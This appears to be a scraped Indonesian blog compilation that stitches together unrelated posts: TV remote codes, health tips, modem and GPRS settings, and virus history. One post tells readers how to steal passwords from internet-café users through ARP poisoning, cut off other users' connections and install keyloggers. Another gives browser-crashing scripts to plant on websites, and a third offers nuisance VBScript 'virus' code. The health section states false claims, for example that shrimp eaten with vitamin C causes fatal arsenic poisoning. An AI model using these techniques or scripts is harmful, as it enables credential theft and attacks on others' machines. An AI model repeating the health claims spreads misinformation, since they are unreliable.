151,152,024,147,253,017,000
SUKIRA
102,056,073,053,101,187,224,181,104
SOLITRON
050,120,024,043,102,104,224,181,073
SUMO
147,017,151,253,152,150,147,024,000
SUPERSTAR
104,102,224,181,224,181,073,103
SUPERTECH
120,102,104,181,224,073,103
SUPERTURBO
077,102,106,104,187,181,073,224,103
SUPRA
024,043,120,104,224,181,073,102,103
TAMSONICH
024,104,102,181,131,187,073,025,103
TANAKA (MESIN TV)
102,104,106,103,187,181,224,073
TAMASI
102,104,073,053,024,103
TENNOK
102,104,103,224,181,073
TELESONIC
120,102
TELETEX
120
THOMSON
033,080,280,221,252,255,257,264,
270
TICSONIC
102,104,187,181,224,073,103
TOSHIBA
128,089,090,014,016,027,053
Toshiba LCD
089,128
TURBO
077,000,147,151,214,150,017,253
TOBO
016,025,053,056,079,101,103
TV MEDIA
102,104,073,053,024,103
UNISAT
102,104,073,053,103,024,131,181,224
u-SLIM
000
VEGATRONVICTOR
053
VIDEO
053
VISONIC
131,188,102,104,073,053,103
VITRON
073,181,224,102,187,103,104
VOTRE
073,102,104,053,024,103
WCOM TORAS
102,104,073,103
WINASAT
102,224,104,181,224,104,073,103
WINSAR
102,187,181,224,104,073,103
WINSTAR
102,104,073,053,024,103
W-SONIC
104,102,224,103,073
XEGOGO
027,102,104,103,224,181,073
XCEL
147,00018
YONGMA
102,104,181,224,073,103
YUNDAI
102,104,181,224,073,103
ZIPPEIN
000,151

Racun Di Sekitar Kita


1. BEKAS BOTOL AQUA

Mungkin sebagian dari kita mempunyai kebiasaan memakai dan memakai
ulang botol plastik (Aqua, VIT , etc) dan menaruhnya di mobil atau di
kantor. Kebiasaan ini tidak baik, karena bahan plastic botol
(disebut juga sebagai polyethylene terephthalate or PET) yang dipakai
di botol2 ini mengandung zat2 karsinogen (atau DEHA). Botol ini aman
untuk dipakai 1-2 kali saja, jika anda ingin memakainya lebih lama,
tidak boleh lebih dari seminggu, dan harus ditaruh ditempat yang jauh
dari matahari. Kebiasaan mencuci ulang dapat membuat lapisan plastik
rusak dan zat karsinogen itu bisa masuk ke air yang kita minum. Lebih
baik membeli botol air yang memang untuk dipakai ber-ulang2, jangan
memakai botol plastik.

2 . PENGGEMAR SATE

Kalau Anda makan sate, jangan lupa makan timun setelahnya. Karena
ketika kita makan sate sebetulnya ikut juga karbon dari hasil
pembakaran arang yang dapat menyebabkan kanker. Untuk itu kita punya
obatnya yaitu timun yang disarankan untuk dimakan setelah makan
sate. Karena sate mempunyai zat Karsinogen (penyebab kanker) tetapi
timun ternyata punya anti Karsinogen. Jadi jangan lupa makan timun
setelah makan sate.

3. UDANG DAN VITAMIN C

Jangan makan udang setelah Anda makan Vitamin C. Karena ini akan
menyebabkan keracunan dari racun Arsenik (As) yang merupakan proses
reaksi dari Udang dan Vitamin C di dalam tubuh dan berakibat
keracunan yang fatal dalam hitungan jam.

4. MI INSTAN

Untuk para penggemar mi instan, pastikan Anda punya selang waktu
paling tidak 3 (tiga) hari setelah Anda mengkonsumsi mi instan, jika
Anda akan mengkonsumsinya lagi, dari informasi kedokteran, ternyata
terdapat lilin yang melapisi mi instan. Itu sebabnya mengapa mi
instan tidak lengket satu sama lainnya ketika dimasak. Konsumsi mie
instan setiap hari akan meningkatkan kemungkinan seseorang terjangkiti
kanker. Seseorang, karena begitu sibuknya dalam berkarir tidak punya
waktu lagi untuk memasak, sehingga diputuskannya untuk mengkonsumsi mi
instan setiap hari . Akhirnya dia menderita kanker.
Dokternya mengatakan bahwa hal ini disebabkan karena adanya lilin
dalam mi instan tersebut. Dokter tersebut mengatakan bahwa tubuh kita
memerlukan waktu lebih dari 2 (dua) hari untuk membersihkan
lilin tersebut.

5. BAHAYA DIBALIK KEMASAN MAKANAN

Kemasan makanan merupakan bagian dari makanan yang sehari-hari kita
konsumsi. Bagi sebagian besar orang, kemasan makanan hanya sekadar
bungkus makanan dan cenderung dianggap sebagai “pelindung ” makanan.
Sebetulnya tidak tepat begitu, tergantung jenis bahan kemasan.
Sebaiknya mulai sekarang Anda cermat memilih kemasan makanan. Kemasan pada
makanan mempunyai fungsi kesehatan, pengawetan,
kemudahan, penyeragaman, promosi, dan informasi. Ada begitu banyak
bahan yang digunakan sebagai pengemas primer pada makanan, yaitu
kemasan yang bersentuhan langsung dengan makanan …
Tetapi tidak semua bahan ini aman bagi makanan yang dikemasnya.

Inilah ranking teratas bahan kemasan makanan yang perlu Anda waspadai.

A. Kertas .

Beberapa kertas kemasan dan non-kemasan (kertas koran dan majalah)
yang sering digunakan untuk membungkus makanan, terdeteksi mengandung
timbal (Pb) melebihi batas yang ditentukan. Di dalam
tubuh manusia , timbal masuk melalui saluran pernapasan atau tangan kita.
pencernaan menuju sistem peredaran darah dan kemudian menyebar ke
berbagai jaringan lain, seperti: ginjal , hati, otak, saraf dan tulang.
Keracunan timbal pada orang dewasa ditandai dengan gejala 3 P, yaitu
pallor (pucat), pain (sakit) & paralysis (kelumpuhan) . Keracunan yang
terjadipun bisa bersifat kronis dan akut. Untuk terhindar dari makanan
yang terkontaminasi logam berat timbal, memang susah-susah gampang.
Banyak makanan jajanan seperti pisang goreng, tahu goreng dan tempe
goreng yang dibungkus dengan Koran karena pengetahuan yang kurang dari
si penjual, padahal bahan yang panas dan berlemak mempermudah
berpindahnya timbale makanan tsb.
Sebagai usaha pencegahan , taruhlah makanan jajanan tersebut di atas piring.

B . Styrofoam

Bahan pengemas styrofoam atau polystyrene telah menjadi salah satu
pilihan yang paling populer dalam bisnis pangan. Tetapi, riset terkini
membuktikan bahwa styrofoam diragukan keamanannya. Styrofoam
yang dibuat dari kopolimer styren ini menjadi pilihan bisnis pangan
karena mampu mencegah kebocoran dan tetap mempertahankan bentuknya saat
dipegang. Selain itu, bahan tersebut juga mampu
mempertahankan panas dan dingin tetapi tetap nyaman dipegang,
mempertahankan kesegaran dan keutuhan bahan yang dikemas, biaya murah,
lebih aman, serta ringan. Pada Juli 2001, Divisi Keamanan Pangan
Pemerintah Jepang mengungkapkan bahwa residu styrofoam dalam makanan
sangat berbahaya. Residu itu dapat menyebabkan endocrine disrupter
(EDC), yaitu suatu penyakit yang terjadi akibat adanya
gangguan pada system endokrinologi dan reproduksi manusia akibat
bahan kimia karsinogen dalam makanan.

Setting modem Smartfren di Backtrack


:smartfren CE682
:Backtrack 5r3
:Asus P5PE-VM + 1 DVDROM

01. colokin modem nya
02. buka terminal (ctrl+alt+t)
03. ketik “lsusb”
04. ketik “eject /dev/sr1”
05. ketik “modprobe usbserial vendor=0x201e product=0x1022”
06. ketik “wvdialconfig”
07. ketik “gedit /etc/wvdial.conf”
08. copy paste code di bawah ini ke dalam wvdial.conf

[Dialer smart]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2 +FCLASS=0
Carier Check = no
Modem = /dev/ttyUSB0
Command Line = ATDT
Phone = #777
Idle Seconds = 0
Password = smart
Modem Type = Analog Modem
Stupid Mode = yes
Baud = 460800
New PPPD = yes
Ask Password = 0
ISDN = 0
Username = smart

09. simpan dan tutup aplikasi gedit nya
10. ketik “wvdial smart” and enjoy with coffee 🙂

note:
setiap kali ingin menggunakan. misalnya ketika komputer baru di restart atau di shutdown. jalan kan langkah-langkah nomer 1,2,3,4,5 dan langsung ke langkah 10.

Flashdisk sebagai senjata mungil para hacker


Flashdisk yang kita kenal adalah sebuah perangkat portable yang sering digunakan sebagai media penyimpanan data, baik data pekerjaan kantor, kampus atau data-data penting lainnya.karena konsep dasar diciptakannya flashdisk adalah sebagai media penyimpanan data yang bersifat portabel dan gampang dibawa kemana-mana, banyak pemilik flashdisk yang menganggap flashdisk hanya berguna sesuai dengan konsep dasar penciptaannya. padahal dengan sedikit kreativitas anda dapat menjadikan flashdisk anda sebagai sebuah media pembantu dalam proses pembelajaran dan tindakan hacking maupun penerapan security/keamanan anda saat beraktivitas pada komputer yang anda gunakan.

Sebagai langkah awal sebelum masuk pada pembahasan yang lebih jauh,saya akan memaparkan apa yang saya lakukan pada flashdisk yang saya gunakan. flashdisk saya disini hanyalah sebagai pembanding karena tentunya anda memiliki ide yang lain yang ingin anda terapkan. pada flashdisk saya telah terinstall 2(dua) aplikasi portable yaitu PORTABLEAPPS buatan PortableApps.com dan LIBERKEY dari LiberKey.com. kedua aplikasi tadi kemudian saya bagi penggunaannya sesuai dengan kebutuhan. Penggunaannya akan saya paparkan lebih terperinci seperti di bawah ini :
PORTABELAPPS
Anda sudah pasti pernah bekerja pada computer anda melalui windows explorer dikarenakan pada modus ini anda leluasa dalam mengatur direktori maupun berpindah direktori secara lebih efisien karena windows explorer menampilkan directory melalui folder tree. Nah, portableapps memiliki fungsi yang hampir sama dengan windows explorer dan sangat mirip dengan my document pada system operasi windows. Anda bahkan mempunyai menu start tersendiri untuk mengakses flasdisk anda dan menjalankan program yang digunakan layaknya menu start pada windows. Dengan kemampuan seperti ini, maka anda dapat mengatur file-file yang ada pada flashdisk anda dengan rapi karena telah tersedia secara default beberapa direktori seperti Documents, music, video, picture, explorer ( layaknya windows explorer ) bahkan tersedia directori untuk backup, menu option, help dan fungsi search. Beberapa software disertakan secara default antara lain:
1. Browser Mozilla firefox portable mode
2. Mozilla thunderbirth
3. CCleaner ( penghapus jejak dan file sampah atau temporary file )
4. Clamwin portable ( anti virus )
5. keePass portable
6. open office
7. beberapa aplikasi multimedia,dsb.
Berdasarkan karakteristiknya, portableapps sebaiknya digunakan sebagai tools manajemen flashdisk anda serta editor untuk file tuga-tugas anda.
LIBERKEY
Inti dari tutorial ini berada pada aplikasi Liberkey. Saya katakan demikian karena jika di ibaratkan sebuah sebuah live disk untuk para hacker ataupun administrator jaringan seperti auditor, whax, slackware atau backtrack ( backtrack 2+ jasakom) maka liberkey bisa dikatakan sebuah system operasi yang berjalan melalui media flashdisk ( dapat pula dianggap sebagai system operasi virtual walaupun sebenarnya hanyalah kumpulan software portable). Secara default liberkey menyertakan beberapa aplikasi yang bias digunakan untuk aktivitas hacking disamping aplikasi standar yang lain.beberapa tools yang bias di gunakan untuk hacking maupun security defence antara lain adalah sebagai berikut:
1. recuva, aplikasi pembalik data yg telah terhapus.
2. Search my files, bias anda gunakan untuk mencari file-file yang terinfeksi firus maupun file-file utama sebuah virus, atau file-file rahasia pada sebuah computer.
3. Picpick, aplikasi screen capture (penangkap gambar)
4. Firefox portable, browser aman di karenakan anda terhindar dari aplikasi jahat pada kebanyakan browser warnet.
5. Runscanner, anti virus sekaligus anti spyware
6. Truecrypt, pengenkripsi disk drive
7. HashMyFile, software pengukur nilai hash
8. UltraShredder, menghapus file secara aman agar tidak bias dikembalikan secara utuh
9. NetWorks, aplikasi analisa data pada koneksi internet
10. PE network configurator, aplikasi untuk konfigurasi jaringan
11. Yale, pengukur bandwith network adapter
12. Team Viewer, aplikasi remote desktop
13. Softperfect Network Scanner, aplikasi scanner jaringan
14. Unlocker, tools penghapus file atau folder yang tidak bias dihapus secara normal.
Liberkey masih mempunyai banyak tools yang tidak penulis paparkan diatas di karenakan jumlahnya cukup banyak untuk di jelaskan, selain akan membuat tutorial ini menjadi tidak efisien dan terlihat seperti menyuapi anda sehingga lebih baik untuk menyerahkan masalah ini pada kreativitas anda masing-masing.ok
Selain tools portable diatas, tentunya ada kekurangan yang mungkin anda rasakan dikarenakan adanya tools favorit anda yang tidak disertakan. Untuk itu anda juga dapat mengisi flashdisk anda dengan software lain seperti Cain able, netcut, angry ip-scanner, super scan, notepad++,anti deepfreezedll.
PENERAPAN
Pada bagian penerapan ini, kita akan membuat sebuah scenario. Kita mengandaikan misalanya anda masuk pada sebuah warnet yang menerapkan retriksi yang ketat. Menu RUN di copot, Commandprompt di babat, bahkan notepad pun di comot. Tentunya anda akan merasa kenyamanan anda terusik akibat retriksi tersebut (masalah klasik, keamanan berbanding terbalik dengan kenyamanan), sehingga anda tidak dapat melakukan aktivitas hacking yang sudah anda pelajari di rumah. Jangan khawatir justru hal seperti ini patut anda jadikan motivasi dan tantangan ( hacking tanpa tantangan/masalah = BASI )dan jangan lupa bahwa anda telah membawa senjata mungil anda( flashdisk ).
Beberapa hal kecil yang bisa anda lakukan misalnya, jika anda ingin menggunakan command prompt yang diretriksi, anda bisa membuatnya dengan teks editor notepad. Buka notepad kemudian ketikkan “command.com” tanpa tanda petik dan save dengan ekstensi “.bat” pada desktop anda, selamat anda bias menggunakan command prompt. Notepad di retriksi? Jangan khawatir, ingat selalulah membawa file notepad kosong pada flashdisk anda atau anda bias mendownload sebuah file yang belum memiliki software default sebagai pembukanya. Gunakan open with notepad dan hapus halaman notepad tersebut lalu ketikkan code untuk membuat commandprompt. Selamat anda berhasil.
Jaringan terasa lambat dikarenakan bandwith yang terbagi pada semua computer di jaringan? Gunakan NETCUT yang telah anda bawa pada senjata mungil anda. Jalankan netcut dan cut koneksi computer lain dijaringan.selamat bandwith anda bertambah
Ingin mencuri password administrator atau FB pengguna warnet? Jalankan CAIN ABEL pada modus ARP poisoning dan silahkan menunggu korban anda.
Ingin memasang keylogger atau sejenisnya, jalankan anti deepfreeze. Selamat keylogger anda telah berjalan tanpa harus memusingkan deepfreeze yang telah anda lumpuhkan

Anda masih bias melakukan banyak hal lainnya sesuai kebutuhan anda. Sampai saat ini anda mungkin telah mendapat gambaran bagaimana memanage flashdisk anda menjadi sebuah senjata saat anda berada di dalam sebuah jaringan. Maaf jika tutorial ini masih jauh dari sempurna dan memiliki banyak kekurangan dikarenakan penulis masih bertaraf newbie, hanya motivasi untuk belajarlah yang membuat penulis memberanikan diri untuk tampil kehadapan teman-teman yang hebat di komunitas tercinta ini.

Source:

Membuat Browser Crash & Hank dengan Infinite Frame, Memory Hog dan White Screen Of The Dead


Trik – trik ini bisa anda terapkan pada website atau blog, jadi ketika orang lain akan mengakses halaman tersebut maka browser mereka akan crash dan hank. Oke dimulai saja, berikut triknya :

Trik 1. Infite Frame dan iframe

1. Buka Notepad, kemudian ketikkan script berikut

script frame.html:
<html><body>
<script>
window.open(“iframe.html”, “iframewind”);
</script>
</body></html>
script iFrame.html:
<html><body>
<frame src=”frame.html”>
</body></html>
2. Save As dengan ekstention .html nama filenya terserah, misalkan sentrablog.html ingat pada Save As type pilih All Files.
3. Kemudian buka file yang disave tersebut menggunakan Mozila atau IE, hahahaa…..awas browsernya crash ya.
Script diatas untuk membuka frame dalam frame, kalo lama kelamaan maka akan menimbulkan web browser menjadi hang.
Trik 2. Memory Hog
1. Buka Notepad, kemudian ketikkan script berikut
<html><body>
<script>
var i, one_meg, memory;
one_meg=”123456789ABCDEF”;
for (i = 4; i <= 20;i++) {
one_meg += one_meg;
}
memory = one_meg;
while(1) {
memory += one_meg;
}
</script>
</body></html>
2. Save As dengan ekstensi .html sama seperti cara diatas
Script ini dapat mengalokasikan memory sampai gak bersisa, kalau pada windows 9x akan menyebabkan crash.
Trik 3. White Screen Of The Death
Caranya sama seperti diatas, ketikkan script berikut lalu save, berikut ini scriptnya ;
<html><body>
<script>
mywind = window.open(“death.html”, “full”);
“fullscreen=yes,location=no,menubar=no,resizeable=no,scrollbars=no,toolbars=no,left=1,top=1,screenX
=1,screenY=1,width=”+window.screen.width+”,height=”+window.screen.oprn.height
);
</script>
<body></html>

Perbedaan Worm, Virus, Trojan Horse dan Malicious Toolkits


Virus dan Worm merupakan salah satu program – program yang merusak dan membahayakan pengguna komputer. Jika tidak tahu bagaimana mencegahnya maka siap – siap data – data penting anda akan hilang atau disadap oleh orang lain. Untuk mengungkap bagaimana sejarah dan asal mula worm, anda bisa membaca postingan saya yang ini “ Sejarah dan Asal Mula WORM “.

Istilah “virus” selalu digunakan sebagai suatu acuan umum untuk setiap malcode (program atau script yang dibuat dengan tujuan membahayakan atau merugikan sebuah system komputer), seperti worm, trojan bahkan hoax yang sesungguhnya bukan sebuah virus komputer, berikut adalah beberapa jenis malcode tersebut:

1. Computer virus: merujuk pada program yang memiliki kemampuan untuk ber- reproduksi, menulari program lain dan menjadikan file-file program tertular sebagai file infector.

2. Computer worm: merujuk pada program independen yang memiliki kemampuan untuk ber-reproduksi, menulari system komputer dan walaupun mampu untuk menulari program lain namun tidak bertujuan untuk menjadikan file tertular tersebutsebagai suatu file infector.

3. Trojan horse: merujuk pada program independen yang tampaknya berguna, dan ketika dieksekusi, tanpa sepengetahuan pengguna, juga melaksanakan fungsi-fungsi yang bersifat destruktif dan merugikan.

4. Malicious toolkits: merujuk pada program yang didesain untuk membantu menciptakan program-program yang dapat membahayakan sebuah system komputer. Contoh dari program jenis ini adalah tool pembuat virus dan program yang dibuat untuk
membantu proses cracking atau hacking.

Dari beberapa keterangan diatas dapat diperjelas bahwa worm adalah suatu algoritma atau program yang mereproduksi diri sendiri dari system ke system dengan menggunakan media penyimpanan atau suatu jaringan. Worm tidak menginfeksi file program lain dengan tujuan menjadikan file terinfeksi tersebut sebagai file infector.

Worm mampu bekerja tanpa interaksi user, bisa merusak sebuah data secara langsung atau menurunkan kinerja system dengan “mengikat” sumber daya system komputer dan bahkan bisa mematikan sebuah jaringan. Berbeda dengan virus yang melakukan infeksi dengan ‘menumpang’ pada file program lain, menunggu interaksi user dan menjadikan file terinfeksi sebagai file infector.

Source:

Computer Worm 1 – Secret of Underground Coding

Achmad Darmal-Jasakom

Fixing the ‘Warcraft III\InstallPath’ Registry Error


When I was going to patch my copy of WarCraft 3: The Frozen Throne (aka WC3) this evening, an error occurred when the patch, War3TFT_125b_English.exe, was executed:

Registry error loading key ‘Warcraft III\InstallPath’
The system cannot find the file specified.

The reason I got this error was that my copy of WC3 was from an external backup harddrive, meaning I hadn’t made a fresh install on the harddrive. When I tried to access the Blizzard Support, all I got was “Knowledge Base currently unavailable”. Searching for it gave moot results, such as “re-install the game” and “contact Blizzard”. With a few try-and-fail‘s I got it working:
1. Run the game and make some configurations, then exit game

2. Run the Registry Editor: Start > Run > regedit

3. Navigate to HKEY_CURRENT_USER > Software > Blizzard  Entertainment > Warcraft III

4. Right-click, choose New > String Value, call it InstallPath

5. Right-click on InstallPath and choose Modify

6. In Value Data, write the adress to your W3C folder, for instance  D:\Games\Warcraft III\

7. Click OK, then close Registry Editor

8. Run patch
The first instruction is just to make sure there’s some registry details for WC3 for the Registry Editor. The configurations you make in-game doesn’t need to be any special. Just turn the background music off, for instance.

Download PCMAV (PC Media Anti Virus)


PCMAV 5.0 Valhalla telah diluncurkan bersamaan dengan terbitnya majalah PC Media edisi 4/2011, pada rilis kali ini PCMAV Valhalla telah menggantikan versi Ragnarok3 sebelumnya. Pada PCMAV 5.0 Valhalla telah dilakukan berbagai perbaikan dan penambahan berbagai fitur baru serta penambahan database hingga 4.025 virus beserta variannya.

Apa yang baru?

  • LinkProtector: Merupakan salah satu fitur utama terbaru yang dapat memberi perlindungan pengguna saat berinternet. Fitur LinkProtector ini mampu mencegat website berbahaya yang memiliki potensi menyebarkan malware hingga tindakan phising. Dengan kumpulan database yang dapat di-update, keamanan dalam berinternet pun dapat terjaga.
  • Anti-Keystroke: Salah satu ancaman dari malware yang popular saat ini yaitu pencurian data. Fitur terbaru Anti-Keystroke akan mencegat secara real-time perekaman tekanan tombol keyboard yang dilakukan oleh sebagian besar program keylogger yang banyak beredar saat ini.
  • Extension Manager: Beberapa extension yang terdapat pada PCMAV 5.0 dapat digunakan sebagai program bantuan dalam menganalisa sistem seperti Task Manager, Process Monitor, dan Locked Handles Viewer. Ke depan, SDK Extension Manager akan dipublikasikan sehingga pihak ketiga dapat pula ikut terlibat dalam membuat extension tambahan, namun keamanannya tetap terjaga.
  • Lock Settings: Proteksi password terhadap konfigurasi yang ditetapkan pengguna agar secara umum setting/konfigurasi PCMAV tidak dapat diubah atau dipaksa exit, khususnya oleh malware
  • UPDATED! Ditambahkan database pengenal dan pembersih 101 virus lokal/asing/varian baru yang dilaporkan menyebar di Indonesia. Total 4025 virus beserta variannya.
  • ADDED! Removal engine khusus untuk membersihkan secara tuntas virus KiamatParay dan Xor2009 yang menyebar luas di Indonesia.
  • IMPROVED! Perubahan nama virus mengikuti varian baru yang ditemukan.
  • IMPROVED! Perbaikan beberapa minor bug dan improvisasi kode internal untuk memastikan bahwa PCMAV tetap menjadi antivirus kebanggaan Indonesia.

 

DOWNLOAD HERE

Source: http://heryantony.com/pcmav-5-0-valhalla-april-2011/

Cara Setting GPRS dan MMS pada Operator GSM


Cara Setting GPRS Dan MMS Pada Operator GSM

KARTU HALLO
Setting Melalui SMS
Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS

KARTU SIMPATI/KARTU AS
Setting Melalui SMS
Kirim SMS ke 6616 dengan pesan :
Ketik : GPRS[spasi]angka dibelakang simcard Anda (Nomor ICCID/Integrated Circuit Card Identification)

Setting Manual GPRS
Profile Name : TSEL GPRS
APN : Telkomsel
User name : wap
Password : wap123
Authentication : Normal
Gateway IP address : 10.1.89.130
Homepage : http://wap.telkomsel.com
Data Bearer : GPRS
Proxy port number : 9201 atau 8000

Setting Manual MMS
Connection Name: tel-MMS
Data Bearer: GPRS
Access Point Name: mms
Username: wap
Prompt Password: No
Password: wap123
Authentication: Normal
Proxy address: 10.1.89.150
Homepage: http://mms.telkomsel.com/
Connection Security: Off

KARTU MATRIX
Setting Melalui SMS
Kirim SMS ke 888 dengan pesan :
ACT[spasi]GPRS

KARTU MENTARI
Setting Melalui SMS
Kirim SMS ke 3000 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP

Setting Manual GPRS
Profile Name : INDOSATGPRS
Homepage URL : http://wap.klub-mentari.com
IP Address : 10.19.19.19
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatgprs

Setting Manual MMS
Profile Name : INDOSATGPRS
Homepage URL : http://mmsc.indosat.com
IP Address : 10.19.19.19:8080
Bearer : GPRS
User Name : indosat
Password : indosat
APN : indosatmms

KARTU IM3
Setting Melalui SMS
Kirim SMS ke 3939 dengan pesan :
Ketik : GPRS[spasi] merk HP[spasi] tipe HP

Setting Manual GPRS
Connection name : M3-GPRS
Access point name : http://www.indosat-m3.net
User name : gprs
Password : im3
Authentication : Normal
Homepage : http://wap.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

Setting Manual MMS
Connection name : M3-MMS
Access point name : indosatmms
User name : indosatmms
Password : indosatmms
Authentication : Normal
Homepage : http://mmsc.indosat-m3.net
IP address : 010.019.019.019
Port : 9201 (standard), 8080 (proxy)

KARTU XL
Setting Melalui SMS
Ketik SMS dengan isi : GPRS[spasi][spasi] Kirim ke 9667
Ketik SMS dengan isi : MMS[spasi][spasi] Kirin ke 9667

Setting Manual GPRS
Connection Name: XL-GPRS
Data Bearer: GPRS
Access Point Name: http://www.xlgprs.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://wap.lifeinhand.com
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080

Setting Manual MMS
Connection Name: XL-MMS
Data Bearer: GPRS
Access Point Name: http://www.xlmms.net
Username: xlgprs
Prompt Password: No
Password: proxl
Authentication: Normal
Homepage: http://mmc.xl.net.id/servlets/mms
Connection Security: Off
Session Mode: Permanent
IP Address: Automatic
Proxy Server Address: 202.152.240.050
Proxy Port Number: 8080

KARTU 3(THREE)
Setting Manual GPRS
Settings Name: 3-GPRS
Homepage : http://wap.three.co.id/
Proxies : Enable
Proxy address : 10.4.0.10
Port : 3128
GPRS access point : 3gprs
Authentication type : Normal
Login type : Automatic
Username : 3gprs
Password : 3gprs

Setting Manual MMS
Settings name : 3-MMS
Homepage : http://mms.hutch.co.id/
GPRS access point : 3mms
Authentication type : Normal
Username : 3mms
Password : 3mms
Allow adverts : No

KARTU AXIS
Setting Manual GPRS
Connection Name : AXIS
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXIS
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage : http://wap.axisworld.co.id
Connection Security : Off
Session Mode : Permanent

Setting Manual MMS
Connection Name : AXISmms
Data Bearer : GPRS atau PS
Access Point Name (APN) : AXISmms
Username : AXIS
Prompt Password : No
Password : 123456
Authentication : Normal
Gateway/Proxy IP Address : 10.8.3.8
Gateway/Proxy Port : 9201 atau 8080
Homepage / MMS Server : http://mmsc.AXIS
Connection Security : Off
Session Mode : Permanent

Sejarah tentang virus komputer


Virus yang pertama kali muncul di dunia ini bernama [Elk Cloner] lahir kira-kira tahun 1981 di TEXAS A&M. Menyebar melalui disket Apple II yang ada operating systemnya. Sang perusak ini mendisplay pesan di layar : “It will get on all your disks-It will infiltrate your chips–yes it is Cloner!-It will stick to you like glue-It will modify RAM too-send in the Cloner!” Hi……………….
Nama “Virus” itu sendiiri baru diberkan setelah 2 tahun kelahirannya oleh Len Adleman pada 3 November 1983 dalam sebuah seminar yang ngebahas cara membuat virus and memproteksi diri dari virus. Tapi orang-orangorang sering menganggap bahwa virus yang pertama kali muncul adalah virus [Brain] yang justru lahir tahun 1986. Wajar aja, soalnya virus ini yang paling menggemparkan dan paling meluas penyebarannya karean menjalar melalui disket DOS yang waktu itu lagi ngetrend. Lahirnya juga bersamaan dengan [PC-Write Trojan] dan [Vindent]
Mulai saat itu, `virus mulai menguasai dunia. Perkembangannya mengerikan dan sangar banget ! berselang satu tahun muncul virus pertama yang menginfeksi file. Biasanya yang diserang adalah file yang berekstensi *.exe Virus ini bernama [suriv] termasuk dalam golongan virus “jerussalem”. Kecepatan penyebarannya cukup ‘menggetarkan hati’ untuk saat itu. Tapi virus ini ngga’ terlalu jahat ko’ soalnya virus ini menghantam dan menghajar mainframe-nya IBM ngga’ lama-lama, cuma setahun (eh setahun itu lama apa sebentar ya…?)
Tahun 1988, muncul serangan BESAR terhadap Machintosh oleh virus [MacMag] dan [scores] dan jaringan Internet dihajar habis-habisan oleh virus buatan Robert Morris. Tahun 1989 ada orang iseng yang ngirim file “AIDS information program” dan celakanya, begitu file ini dibuka, yang didapat bukannya info tentang AIDS, tapi virus yang mengenskrypsi harddisk dan meminta bayaran untuk kode pembukanya (hehehe…….. ada-ada aja cara orang nyari duit)
Sejak saat itu, penyebaran virus udah ngga’ keitung lagi. Akan tetapi dampak yang ditimbulkan ngga’ terlalu besar. Baru tahun 1995 muncul serangan besar-besaran. Ngga’ tanggung-tanggung, mereka nyerang perusahaan-perusahaan besar diantaranya Griffith Air Force Base, Korean Atomic Research Institute, NASA, IBM dan masih banyak PERUSAHAAN RAKSASA lain yang dianiaya oleh “INETRNET LIBERATION FRONT” di hari ~Thanksgiving~. Karena keberanian dan kedahsyatan serangan itu, tahun 1995 dijuluki sebagai tahunnya para Hacker dan Cracker.
Para Cracker memang tidak pernah puas. Setiap muncul sistem operasi atau program baru, mereka sudah siap dengan virus barunya. Kamu yang sering ngetik dengan MS Word mungkin pernah nemuin virus Titassic. Ini virus local asli Indonesia lho… and uniknya, virus ini ngingetin kita buat sholat tepat pada waktunya (waduh, alim juga ya..) Tapi jangan salah, virus macro yang punya judul [concept]ini juga bisa berhati jahat, sangar and ganas banget. Soalnya si alim yang jahat ini bakalan ngemusnahin 80%  file-file data and program korbannya.
Nah, seiring dengan perkembangan teknologi, muncul virus pertama yang mengkombinasi virus macro dan worm. Namanya cukup manis [Melissa]. Tapi ngga’ semanis namanya, virus ini bakalan menyebar ke orang lain lewat E-Mail and yang paling menyakitkan, ia bakalan nyebar ke semua alamat E-Mail yang ada di address book-mu. Dan saat ini muncul jutaan virus yang bergentayangan ngga’ karuan di alam Internet.

Virus, worm, trojan, malware Open Source


oke kali ini saya akan memberitahukan anda kumpulan script virus worm yang saya dapat dari idws forum oke ini dia script nya:

copy kan semua code dibawah ini ke notepad

———————————————————————
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
———————————END———————————\

 

Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
———————————END———————————

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
———————————END———————————

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
———————————END———————————

MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
———————————END———————————

Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
———————————END———————————

‘Vbs.Vbswg.GHZ 1.0 Created By GHZ. 9/30/2010
